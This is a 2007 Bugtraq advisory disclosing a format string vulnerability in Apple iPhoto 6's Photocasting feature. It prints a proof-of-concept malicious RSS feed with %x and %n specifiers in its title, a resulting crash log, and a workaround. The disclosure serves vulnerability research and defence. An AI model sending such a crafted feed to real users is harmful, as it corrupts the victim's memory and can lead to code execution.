DMA[2007-0104a] - 'iLife iPhoto Photocasing Format String Vulnerability'

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: DMA[2007-0104a] - 'iLife iPhoto Photocasing Format String Vulnerability'
From: "K F (lists)" <kf_lists@xxxxxxxxxxxxxxxxxxx>
Date: Thu, 04 Jan 2007 13:15:12 -0500
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
User-agent: Thunderbird 1.5.0.9 (Macintosh/20061207)

DMA[2007-0104a] - 'iLife iPhoto Photocasing Format String Vulnerability'
Author: Kevin Finisterre
Vendor(s): http://www.apple.com
Product: 'iLife 06 (?)'
References: 
http://www.digitalmunition.com/DMA[2007-0104a].txt
http://www.apple.com/ilife/iphoto/features/photocasting.html
http://projects.info-pull.com/moab/MOAB-04-01-2007.html

Description:
Rebuilt for blazing performance, iPhoto makes sharing photos faster, simpler, 
and cooler than 
ever before. It adds eye-opening features to the ones you already love, 
including Photocasting, 
support for up to 250,000 photos, easy publishing to the web, special effects, 
and new custom 
cards and calendars. In essence iPhoto lets you spread smiles far and wide.

As easily as you can create a new photo album you can share it with friends and 
family thousands 
of miles away. A new feature in iPhoto 6, Photocasting allows .Mac members to 
share albums with 
anyone, anywhere. Say you have new photos of little Johny Pwnerseed. Place the 
photos you'd like 
to share in an album called "Johny Pwnerseed's Latest Pics.", then click 
"Photocast this Album". 
iPhoto publishes the album, and others can subscribe to it by clicking a link 
in an email you 
send.

But here's where the real fun begins. If you create a malformed XML file you 
can simulate the 
photocasting functionality in iPhoto 6 and use it to trigger a format string 
vulnerability. Once 
Aunt Sophia subscribes, the fake photos feed is automatically download into a 
"Johny Pwnerseed's 
Latest Pics" album that instantly triggers a format string write via %n. 

We're talking beautiful, full-res pwnage. Aunt Sophia is pretty much screwed if 
you are able to 
properly format your payload. 

<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:aw="http://www.apple.com/ilife/wallpapers";>
<channel>
<title>%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%n.%n.%n.%n.%n.%n</title>
<item>
<title>Welcome to Pwndertino!</title>
<aw:image>http://www.digitalmunition.com/digital_munitions_detonator.jpg
</aw:image>
</item>
</channel>
</rss>

Host Name:      Aunt-Sophias-computer
Date/Time:      2006-12-04 19:52:51.035 -0500
OS Version:     10.4.8 (Build 8L2127)
Report Version: 4

Command: iPhoto
Path:    /Applications/iPhoto.app/Contents/MacOS/iPhoto
Parent:  WindowServer [83]

Version:        6.0.5 (6.0.5)
Build Version:  2
Project Name:   iPhotoProject
Source Version: 3160000

PID:    438
Thread: 0

Exception:  EXC_BAD_ACCESS (0x0001)
Codes:      KERN_PROTECTION_FAILURE (0x0002) at 0x00389ddc

Thread 0 Crashed:
0   libSystem.B.dylib           0x9000c0c1 __vfprintf + 4976
1   libSystem.B.dylib           0x90100ea9 snprintf_l + 504
2   com.apple.CoreFoundation    0x908119d5 _CFStringAppendFormatAndArgumentsAux 
+ 4018
3   com.apple.CoreFoundation    0x9081091c 
_CFStringCreateWithFormatAndArgumentsAux + 122
4   com.apple.Foundation        0x925daa5d -[NSPlaceholderString 
initWithFormat:locale:arguments:] + 162
5   com.apple.Foundation        0x92678e6c +[NSString 
localizedStringWithFormat:] + 129
6   com.apple.iPhoto            0x0002ae3a 0x1000 + 171578
7   com.apple.iPhoto            0x0031298f 0x1000 + 3217807

Workaround:
Unregister the iphoto:// URL handler with RCDefaultsApp

Check out Landon's website... he has been on the ball the last few days. 
http://landonf.bikemonkey.org/

He has also set aside a google group for MOAB issues. 
http://groups-beta.google.com/group/moabfixes?hl=en

http://www.apple.com/support/security/
http://docs.info.apple.com/article.html?artnum=61798

Prev by Date: RE: [WEB SECURITY] Universal XSS with PDF files: highly dangerous
Next by Date: Re: a cheesy Apache / IIS DoS vuln (+a question)
Previous by thread: RE: [Full-disclosure] Concurrency strikes MSIE (potentially exploitablemsxml3 flaws)
Next by thread: [USN-398-3] Firefox theme regression
Index(es):
- Date
- Thread